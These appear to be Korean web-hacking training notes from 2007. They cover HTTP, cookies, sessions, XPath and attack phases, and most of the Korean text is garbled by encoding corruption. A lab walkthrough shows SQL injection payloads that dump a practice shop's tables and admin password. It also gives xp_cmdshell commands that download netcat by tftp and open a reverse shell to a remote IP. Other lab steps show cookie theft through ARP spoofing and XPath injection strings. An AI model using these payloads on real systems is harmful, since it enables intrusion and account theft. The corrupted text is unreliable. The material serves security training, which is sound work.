WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
ํฐ๋๋ง(plink)
ssh scp sftp (๋ฐ์ด๋๋ฆฌ๊ฐ ์๋ ์์คํค๋ก ํต์์ ํ๊ธฐ ๋๋ฌธ์)
Nmap
Windumptcpdumpwireshark
-Follow tcp stream
-Filter out
-Time ํ๊ธฐ Mark
-Analysis Static
-Sniffer Pro ํ์ฉ
DBMS Basic
-SELECTUPDATEINSERTDELETE
๊ธฐ๋ณธ์ฐ์ฐ์
WHRER๊ฒ์์กฐ๊ฑดHAVING๊ฒ์์กฐ๊ฑด
์งํฉ์ฐ์ฐ์
-CREATEDROP command
-ACID TRANSACTIONCOMMIT ๊ฐ๋
๋ฐฑ์ ์ ์ข ๋ฅ
-FULL Incremental Differential BACKUP
์น ๊ธฐ์ด
์น ๋ธ๋ผ์ฐ์ rarr ๋ฐฉํ๋ฒฝ rarr ์น ์๋ฒ rarr ์น ์ดํ๋ฆฌ์ผ์ด์ rarr ๋ฐ์ดํฐ๋ฒ ์ด์ค
http wwwsitecom showtablesasppage=1 amp name=username
(๋ฐฉํ๋ฒฝ)(์น์๋ฒ) (์น ์ดํ๋ฆฌ์ผ์ด์ ) (๋ฐ์ดํฐ๋ฒ ์ด์ค)
Special Char amp = +
Escape parser ampใ ก
amplt = lt (Less than) ํด๋ผ์ด์ถํธ์ธต์์ ์คํ์๋๊ฒ ํ๊ธฐ ์ํด์ ์ด๋ค
์๋๋ณ ๋ฑ์ฅ ๊ธฐ์
HTTP ํ๋กํ ์ฝ ๋ช ์ธ
HTML CSS
SCRIPTS JAVASCRIPTSVB
CGI C PERL
APPLET ACTIVE X ํด๋ผ์ด์ถํธ ์ธก ์๋ํ
HTTPS SSLTLS
์น์ดํ๋ฆฌ์ผ์ด์ ๋ฑ์ฅ ์๋ฒ์ธก ์๋ํ(ASPPHPJSP)
XML SHTML ๋ฐ์ดํฐ ์ ์ฅampํต์ ํฌ๋งท ์ค์
WEB SERVICEAJAX SOAP WSDL UDDI
CGI(Common Gate Interface)
-์น ์๋ฒ๋ก๋ถํฐ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์ ๋ณด๋ฅผ ์ ๋ฌํ๊ณ ์ ์ ํ ํํ๋ก ์ ๋ณด๋ฅผ ๋ธ๋ผ์ฐ์ ์๊ฒ ๋ฐํํ๊ธฐ ์ํ ํต์๊ท
์ฝ(ํ์ค)
-CGI๋ ์ถ์ด๊ฐ ์๋๋ผ ์ผ์ข ์ ํต์ ์ง์นจ์
-CGI์ง์ ์ถ์ด์คํฌ๋ฆฝํธ (PERL C C++ JAVA PHP ASP JSCRIPT)
-์น ํด๋ผ์ด์ถํธ๋ HTTPFORM์ ํํ๋ก ์น ์๋ฒ์๊ฒ ์ ๋ณด ์ ์ก
-์น ์๋ฒ๋ ํด๋ผ์ด์ถํธ๋ก๋ถํฐ ๋ค์ด์จ ์์ฒญ๊ณผ ํ๊ฒฝ๋ณ์ ์ ๊ฐ์ ์ฑ์ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์ ๋ฌ
-์คํฌ๋ฆฝํธ๋ ์ผ๋ฐ LANGUAGE๋ก CGI๋ก ์์ฑ์
Content-type texthtmlnn ํค๋ ๋ฐ๋์ ๋ฐํํ์ฌ์ผ ํจ
ํ๊ฒฝ๋ณ์
SERVER_SOFTWARE REMOTE_HOST
QUERY_STRING REMOTE_ADDR
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 2
QUERY_STRING REMOTE_ADDR
SERVER_PORT HTTP_USER_AGENT
REQUEST_METHOD
CONTENT_TYPE
CONTENT_LENGTH
HTTP
HTTP(HYPERTEXT TRANSFER PROTOCOL)
-TCP ๊ธฐ๋ฐ์ ํ๋กํ ์ฝ
-REQUEST ์ RESPONSE์ ๊ตฌ์กฐ๋ก ๋์ด ์์
-STATELESS ํ ํ๋กํ ์ฝ(REQUEST ์ RESPONSE๊ฐ ์ด๋ฃจ์ด์ง๋ฉด ์ ์์ด ์ข ๋ฃ๋จ (HTTP10)
๊ธฐ๋ณธ์ฉ์ด
URI (Uniform Resource Idenifier)
-์ธํฐ๋ท ์์ ์์์ ์๋ณํ๊ธฐ ์ํ ๋ฌธ์์ด
URL(Uniform Resource Locator)
-์์์ ์์น ์ ๋ณด๊ฐ ์ค์
-httpwwwsitecomsearchasp
URL(Uniform Resource Name)
-์์์ ์์น์ ์๊ด์์ด ์์ฒด์ ์ ๋ณด๊ฐ ์ค์ํ๋ค
-urnisbn021702452
HTTP ํ๋กํ ์ฝ ํต์ ๋ฐฉ์
HTTPResposeHeader
HTTPRequestHeader
HTTP 10
ํ๋์ ๋ฌธ์์ ๊ทธ๋ฆผ์ด ํ๋ ์๋๋ผ๋ ์ต์ด ํ ์คํธ๊ฐ ์ ์ฅ๋ HTTP ๋ฌธ์๋ฅผ ์ ์ก๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๊ทธ๋ฆผ์
๋ฐ๊ธฐ ์ํด ๋ค์ ์ฐ๊ฒฐ์ ์ค์ ํ ํ ๊ทธ๋ฆผ์ ์ ์ก๋ฐ๋๋ค
HTTP11
์ฐ์๋ ์ฐ๊ฒฐ ์์ฒญ์ด ์์ ๊ฒฝ์ฐ์ HTML ๋ฌธ์๋ฅผ ๋ฐ๊ณ ๋ ๋ค ์ฐ๊ฒฐ์ ๋๊ณ ๋ค์ ์ฐ๊ฒฐ์ ์์ฒญํ์ง ์๊ณ ๋ฐ๋ก ๊ทธ๋ฆผ ํ์ผ
์ ์์ฒญํ๋ค
HTTP 11์ Method
Method ์ค๋ช
GET ์์์์ฒญ
POST ENTITY๋ฅผ ํฌํจํ ์์ ์์ฒญ
HEAD HTTP HEADER ์ ๋ณด๋ง ์์
TRACE Request์ ๋ฃจํ๋ฐฑ ํ ์คํธ
PUT URL์ ์์์ ์์ฑ
DELETE URL์ ์์์ ์ญ์
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 3
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
CONNECT ํฐ๋๋ง์ ๋ชฉ์ ์ผ๋ก ์ฐ๊ฒฐ์์ฒญ(Proxy ์ฐ๊ฒฐ)
GETPOST ๋ฉ์๋
GET๊ณผ POST๋ ์๋ฒ์ ์์์ ์์ฒญํ๋ ์ฌ์ฉ๋จ
GET๋ฐฉ์ POST๋ฐฉ์
์๋ฒ์ ์ ๋ฌํ๊ณ ์ํ๋ ๋ฐ์ดํฐ๋ฅผ URL ์ ํฌํจ์ํด
์ ์กํ ์ ์๋ ๋ฐ์ดํฐ๋์ด ์ ํ๋จ(2K4K)
์๋ฒ์ ์ ๋ฌํ ๋ฐ์ดํฐ๋ฅผ REQUEST Body์ ํฌํจ์ํด
๋ฐ์ดํฐ ์ ์ก๋์ ์ ํ์ด ์์(์๊ฐ์ ํ๊ฐ๋ )
GET loginaspuser_id=adminampuser_pass=1234
HOSTwwwsitecom
POST loginasp HTTP11
HOSTwwwsiteorg
User_id=admin user_pass=1234
get๋ฐฉ์(์น ๋ก๊ทธ๋ 8000์ ๊น์ง๋ง ์ ์ฅํ๋ค)
HEAD ๋ฉ์๋
TRACE ๋ฉ์๋
WEBDAV ๊ด๋ ฆ๋ฉ์๋
PUT
COPY
MOVE
DELETE
MAKECOL
PUT๋ฉ์๋ ์ฌ์ฉ์์
PUT HTTPWWWKISECCOMindex11html HTTP1O
HOSTWWWKISECCOM
Content-Length30
User-AgentBlaBla Client
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 4
User-AgentBlaBla Client
HTTP RESPONSE์ ์ฃผ์ ์๋ต ์ฝ๋
์ฃผ์ ์๋ต์ฝ๋
200 OK 400 BadRequest
201 Created 401 Unauthorized
202 Accepted 403 Forbidden
404 Not Found 301 Moved permanently
302 Found 500 Internal Server Error
HTTP ๊ด๋ ฆ ๊ธฐ์
์ฟ ํค
94๋ ๋ท์ค์ผ์ดํ์์ ๊ฐ๋ฐ
์๋ฒ๊ฐ ์์ฑํ๊ณ ํด๋ผ์ด์ถํธ์ ์ ์ฅ์ํค๋ ๋ฐฉ์
์ ์ฅ์๊ตฌ์ (Persistent๋์คํฌ)๋ฐ์๊ตฌ์ (Non-Persistent ๋ฉ๋ชจ๋ฆฌ)
๋ณด์๋ณด์๋น๋ณด์
์ ํํฌ๊ธฐ์ ํ(4k)๋ณ์์ ํ(2k)
ํ๋ฒ ์ ์ฅ๋ ์ฟ ํค๋ ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ์ด ์ง๋์ง ์๋ ํ ํด๋น ๋๋ฉ์ธ์ ์ ์์ ๋ธ๋ผ์ฐ์ ๊ฐ ์๋์ผ๋ก ํ์ฌํ์ฌ ์ ์ก
ํ๊ฒ ๋จ
์ฟ ํคํ์ผํํ์ฌ์ฉ์์ด๋ฆ์ ์ํ์ฌ์ดํธ
์ฟ ํคํ์ผ๋ด์ฉ๊ฐ๋ฐ์๊ฐ ์ค์ ํ๊ธฐ ๋๋ฆ
๋ํดํธ ๋๋ ํ ๋ฆฌ CDocuments and Setting์ฌ์ฉ์์ด๋ฆCookies
๊ธฐ๋ณธํฌ๋งท
Set-cookie
Name=value ์ฟ ํค์ ์ด๋ฆ
Expire=date ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ
Domain=domain ๋๋ฉ์ธ
Path=path ์ฟ ํค๋ฅผ ์ด์ฉํ์ฌ ์ ์์ฌ๋ฅํ URL
Secure ๋ณด์๋น๋ณด์์ค์
๊ด๋ ฆ ISSUE
์ฌ์ฉ์ ์์์กฐ์ ๋ฐ ์ค๋ํ ํ๋ก์ ๋ฑ์ ํตํ ๋ณ์กฐ๊ฐ๋ฅ
XSS๋ฑ์ ํตํ ํ์ธ์ ์ฟ ํคํ์ทจ
์ฌ์๊ณต๊ฒฉ์ ๋ฌด๋ฐฉ๋น
๋์๋ฐฉ์ ์ฟ ํค๋ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ธฐ๋ณธ ์ฒ ์น ์ฌ์ฉํ ๊ฒฝ์ฐ ๊ฒ์ฆ๋ ์ํธํ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ์ต์ํ์ ์ ๋ณด๋ง
์ ์ฅ ์ฟ ํค์ ๋ฌด๊ฒฝ์ค ๊ฒ์ฌ๋ฅผ ์ํด ์ ์ก๋๋(ํน์ ๋ณ์ ๊ฐ+TimeStamp)๋ฑ์ ์ ๋ณด๋ฅผ ํด์ํ ๊ฐ๊น์ง ๊ฐ์ด
์ ์ก ์๋ฒฝํ์ง ์์ผ๋ ์ธ์ ๊ณผ ๊ฐ์ด ๋ณํ์ ๋ณด์์ฑ ํฅ์
์ธ์ (SESSION)
HTTP์ ์ ์ธ์ ์ ๋ํ ์ฒ๋ฆฌ๋ฅผ ๋ด๋นํ๋ ๊ธฐ์
Server Side ๊ธฐ์ ๋ก HTTP์ Stateless ํ ํน์ฑ์ ๋ณด์ํ๊ธฐ ์ํด Uniq ํ ID๋ฅผ ์์ฑํ์ฌ ํ์ฌ ์ ์ํ ํด๋ผ์ด์ถํธ์๊ฒ
ํ๋นํด์ฃผ๊ณ ๊ธฐ์ตํ๋ ๋ฐฉ์
๊ณผ๊ฑฐ cookie์ ์ ์ฅํ๋ ๋ณ์ ๊ฐ ์ ์ด๊ธฐ ์ ์ ์ ํ๋นํ๊ฒ ๋จ
ํ๋นํ ๋ณ์๋ ์๋ฒ์ ์ ์ฅ๋๋ฉฐ ํด๋ผ์ด์ถํธ ์ธก ์๋ ์ธ์ ID๋ง ๋ถ์ฌ๋จ
์ฃผ๋ก Web Application Server ๋ Web Server ๋ฅผ ํ๋น ๋ฐ์ผ๋ฉฐ ์ด๋ ํด๋น ID์ ํน์ ์ ๋ณด๋ฅผ ์ ์ฅํ ์ ์์
ํด๋ผ์ด์ถํธ๋ ์๋ฒ์ ํต์์ SESSION ID๋ง ์ฃผ๊ณ ๋ฐ์
์ธ์ ID
WASWS ์ธ์ ID๋ณ์
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 5
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
